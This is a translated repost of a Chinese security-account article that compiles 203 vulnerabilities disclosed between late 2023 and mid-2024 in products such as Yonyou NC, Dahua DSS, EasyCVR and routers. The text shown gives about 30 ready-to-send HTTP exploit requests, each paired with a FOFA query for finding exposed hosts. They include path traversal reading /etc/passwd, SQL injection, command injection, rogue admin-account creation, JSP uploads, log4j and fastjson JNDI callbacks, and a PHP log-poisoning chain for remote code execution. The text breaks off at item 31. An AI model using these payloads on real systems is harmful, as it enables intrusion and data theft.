
Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06 (repost)

Posted on 2024-6-5 14:31:29
道一安全 (Daoyi Security), 2024-06-05 07:41, Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks; we hope this article helps with your defense. Defenders can use its contents to check their own exposure.

Vulnerability sources: this article covers 203 POCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024, all collected from other public accounts or websites on the Internet and compiled for publication by the 网络安全新视界 team.

Security patches: all of these vulnerabilities are already public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few POCs that are too long have been replaced with the word PAYLOAD; if you need the full POC, search for it yourself.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version available; press F12 and search for keywords when using it.

Bookmark this article if you find it useful, or follow the public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua (大华) ICC intelligent IoT management platform arbitrary file read
21. Dahua (大华) ICC intelligent IoT management platform random remote code execution
22. Dahua (大华) ICC intelligent IoT management platform log4j remote code execution
23. Dahua (大华) ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou (用友) NC registerServlet JNDI remote code execution
26. Yonyou (用友) NC linkVoucher SQL injection
27. Yonyou (用友) NC showcontent SQL injection
28. Yonyou (用友) NC grouptemplet arbitrary file upload
29. Yonyou (用友) NC down/bill SQL injection
30. Yonyou (用友) NC importPml SQL injection
31. Yonyou (用友) NC runStateServlet SQL injection
32. Yonyou (用友) NC complainbilldetail SQL injection
33. Yonyou (用友) NC downTax/download SQL injection
34. Yonyou (用友) NC warningDetailInfo interface SQL injection
35. Yonyou (用友) NC-Cloud importhttpscer arbitrary file upload
36. Yonyou (用友) NC-Cloud soapFormat XXE
37. Yonyou (用友) NC-Cloud IUpdateService XXE
38. Yonyou (用友) U8 Cloud smartweb2.RPC.d XXE
39. Yonyou (用友) U8 Cloud RegisterServlet SQL injection
40. Yonyou (用友) U8-Cloud XChangeServlet XXE
41. Yonyou (用友) U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou (用友) GRP-U8 SmartUpload01 file upload
43. Yonyou (用友) GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou (用友) GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou (用友) GRP-U8 ufgovbank XXE
46. Yonyou (用友) GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou (用友) GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou (用友) U8 CRM swfupload arbitrary file upload
49. Yonyou (用友) U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPtech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet (畅捷通) T+ getdecallusers information disclosure
56. Chanjet (畅捷通) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu (万户) ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
70. Wanhu (万户) ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) 掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 (DBAPPSecurity) 明御 security gateway aaa_local_web_preview file upload
88. 安恒 (DBAPPSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision (海康威视) operations management center session command execution
93. Qi'anxin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi'anxin (奇安信) 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 (Kirisun) communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 (Kirisun) communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 (Kirisun) communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 (Kirisun) communications command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 (Kirisun) communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing (宏景) EHR downlawbase SQL injection
170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Volans (飞鱼星) Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) omnimedia news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin panel with the default account admin, send the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword…
Host: x.x.x.x

The payload is the double URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request; the login field carries PHP that executes the base64-decoded value of a request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
Disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
Disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua (大华) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua (大华) ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua (大华) ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua (大华) ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. Dahua (大华) ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
